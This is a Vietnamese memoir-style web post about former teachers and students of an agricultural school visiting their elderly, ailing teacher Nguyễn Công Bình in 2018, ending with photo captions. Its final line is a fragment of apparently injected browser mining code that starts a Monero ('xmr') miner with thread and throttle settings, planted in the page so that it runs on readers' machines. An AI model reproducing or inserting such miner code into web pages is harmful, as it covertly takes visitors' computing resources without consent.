Thăm thầy Nguyễn Công Bình tại Sóc Trăng - Trần Thị Tuyết -

Thăm Thầy Nguyễn Công Bình

 Trần Thị Tuyết
 
        Lúc 6 giờ 30 sáng ngày 24/11/2018 thầy trò trường Nông Lâm Súc Định Tường - Bến Tre đã có mặt tại nhà thầy Nguyễn Tông Lộc. Nhóm có 6 người, lên Mỹ Tho rước thêm 9 người. Tổng cộng 16 người khởi hành về Sa Đéc thăm thầy Nguyễn Công Bình.
     Thầy Nguyễn Công Bình là một trong ba người giáo viên đầu tiên về nhận nhiệm sở ở Trường Nông Lâm Súc Định Tường - nhưng không có trường - với nhiệm vụ hết sức khó khăn là thành lập trường. Thầy Nguyễn Công Bình nhận trách nhiệm Xữ Lý Thường Vụ, Cô Hà Kim Phụng - GV Bộ môn Mục Súc, Kiêm Thủ Quỹ, Cô Phan Thị Thu Hà- GV Bộ môn Canh Nông. Thầy Bình là người thầy rất nghiêm khắc trong học tập, nhưng rất vui vẻ với học sinh nên học trò ai cũng thương quý thầy.
     Vào năm 2016, mặc dù thầy rất yếu, đi không được phải ngồi xe lăn nhưng thầy vẫn nói con trai đưa thầy về dự họp mặt với trường trong ngày 1-5 họp mặt truyền thống của trường.
Sang năm 2017 thầy không về dự nữa.

     Đến 11 giờ 30 phút xe đã dừng trước cửa nhà thầy. Mọi người xuống xe, nhìn vào trong thấy bàn ghế sắp sẳn, tất cả im lặng lắng nghe xem có tiếng thầy hay không...Vẫn im lặng. Bước vào trong, nhìn sang gian bên cạnh, mọi người thật ngỡ ngàng ...thầy ngồi im trên ghế, mắt lim dim mơ màng.
 
Mọi người ngầm ra hiệu..." để yên thầy ngủ".
    Khi em Hưng, con của thầy về gọi thầy : " Ba ơi dậy đi, có thầy cô, anh chị đến thăm ba nè! ".
Lúc bấy giờ thầy mới mở mắt từ từ nhìn lên, rồi nhìn chung quanh. Nhưng vẫn không nói tiếng nào. Em Hưng cho biết, thầy đã không nói được từ hơn mấy tháng nay, thấy mọi người thầy nhận biết được nhưng rất chậm. Lúc ra về hình như thầy Bình đã nhớ lại, thầy nắm chặt tay thầy Lộc không muốn rời ra. Ra về mỗi người một tâm trạng, cuộc đời thật vô thường!


Thầy Nguyễn Tông Lộc đưa hình họp mặt 1-5-2016 lần sau cùng có thầy Bình dự họp cho Thầy xem.
Đứng: Thầy Nguyễn Tông Lộc, chị Trần Thị Tuyết, Thầy Trần Văn Lộ
Ngồi:  Thầy Nguyễn Công Bình

Cả đoàn chụp hình lưu niệm với thầy Bình.
Đứng: Võ Anh Dũng, Nguyễn Thị Anh, Nguyễn Thị Phương Loan, X, Kiều Văn Xương, thầy Trần Văn Lộ, Nguyễn Văn Mới, Trần Kiến Gia, Nguyễn Nam Chinh.
Ngồi: X, thầy Nguyễn Tông Lộc, thầy Nguyễn Công Bình, Trần Thị Tuyết.


Ngồi: Thầy Nguyễn Tông Lộc, Thầy Nguyễn Công Bình.
Đứng: Anh Kiều Văn Xương, chị Trần Thị Tuyết, Thầy Trần Văn Lộ, chị Nguyễn Thị Phương Loan

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();